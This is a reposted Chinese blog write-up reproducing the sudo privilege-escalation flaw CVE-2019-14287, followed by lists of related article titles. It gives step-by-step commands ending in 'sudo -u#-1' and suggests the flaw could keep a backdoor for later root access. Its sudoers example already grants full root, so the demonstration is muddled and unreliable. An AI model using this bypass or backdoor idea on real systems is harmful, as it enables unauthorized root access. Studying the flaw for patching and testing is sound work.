CVE-2019-14287_sudo权限提升 - 代码天地

CVE-2019-14287_sudo权限提升

其他 2019-10-18 00:34:11 阅读次数: 0

影响范围

sudo是linux下普通用户使用root权限的命令，sudo配置文件中使用 ALL 语句，可以使普通账号通过vim执行root权限命令。

影响 sudo 1.8.28 之前的所有版本。

漏洞复现

1.查看版本 sudo -V
2.新建普通账号

useradd test
passwd test

3.修改sudo文件
vi /etc/sudoers 添加 test ALL=(ALL:ALL) ALL
4.以普通用户test编辑执行命令
普通执行，是查看不了root权限的文件。
执行 sudo -u#-1 命令

漏洞有点鸡肋，需先修改sudoers文件，顶多做个预留后门，后期使普通账户拥有最高权限。

猜你喜欢

转载自www.cnblogs.com/sstfy/p/11695967.html

CVE-2019-14287_sudo权限提升

CVE-2019-14287 sudo 配置不当-权限提升漏洞预警

PJzhang:CVE-2019-14287 sudo权限绕过漏洞复现

CVE-2019-14287 sudo权限绕过漏洞复现

CVE-2019-14287：sudo 权限绕过漏洞（复现过程）

linux sudo root 权限绕过漏洞(CVE-2019-14287)

CVE-2019-14287：sudo 权限绕过漏洞复现

sudo权限绕过漏洞复现（CVE-2019-14287）

【漏洞测试】SUDO：CVE-2019-14287

Sudo漏洞分析(CVE-2019-14287)

CVE-2019-14287(sudo提权)

四、Linux sudo root 权限绕过漏洞(CVE-2019-14287)

linux sudo root 权限绕过漏洞(CVE-2019-14287)复现

[提权]sudo提权复现(CVE-2019-14287)

linux CVE-2019-14287 Sudo提权漏洞

CVE-2019-14287 sudo提权漏洞分析

CVE-2019-14287 (Linux sudo命令)漏洞复现

sudo提权漏洞，附payload(CVE-2019-14287)

sudo提权漏洞(CVE-2019-14287)

（CVE-2019-14287）sudo提权漏洞

源码安装sudo-1.8.31,解决CVE-2019-14287(sudo提权)问题

10.16Maccms后门分析、Sudo提权漏洞（CVE-2019-14287）复现

CVE-2019-14287 漏洞复现

Linux sudo权限提升漏洞（CVE-2021-3156）修复

（CVE-2021-3156）Linux sudo权限提升漏洞复现

Linux sudo权限提升漏洞（CVE-2021-3156）

Linux sudo权限提升漏洞(CVE-2021-3156)

Linux sudo权限提升漏洞（CVE-2021-3156）复现

Linux sudo权限提升漏洞复现(CVE-2021-3156)

【权限提升】Linux Sudo权限提升漏洞(CVE-2023-22809)

今日推荐

《美国对全球网络空间安全与发展的威胁和破坏》报告发布

火速冲上 GitHub 热榜 —— 开源编程语言、框架哪有这么可爱？

北京人形机器人创新中心发布全球首个纯电驱拟人奔跑的全尺寸人形机器人“天工”

LFOSSA 源来如此公开课 | 掌握云原生未来：CNCF 认证全面攻略与备考秘籍

周排行

让自己的头脑极度开放

CentOS 6.5(x64) 和Redhat6.5操作系误删libc

高可用注册中心

【日记】12.28/【题解】AtCoder AGC041

XML（5）_XML 约束_DTD

Java集合Map（四）

树梅派安装桌面环境教程

pipenv 的使用和安装

小程序白屏问题和内存研究

C语言简单选择排序

每日归档

更多

2024-05-02(0)

2024-05-01(4)

2024-04-30(1)

2024-04-29(40)

2024-04-28(0)

2024-04-27(56)

2024-04-26(39)

2024-04-25(22)

2024-04-24(36)

2024-04-23(26)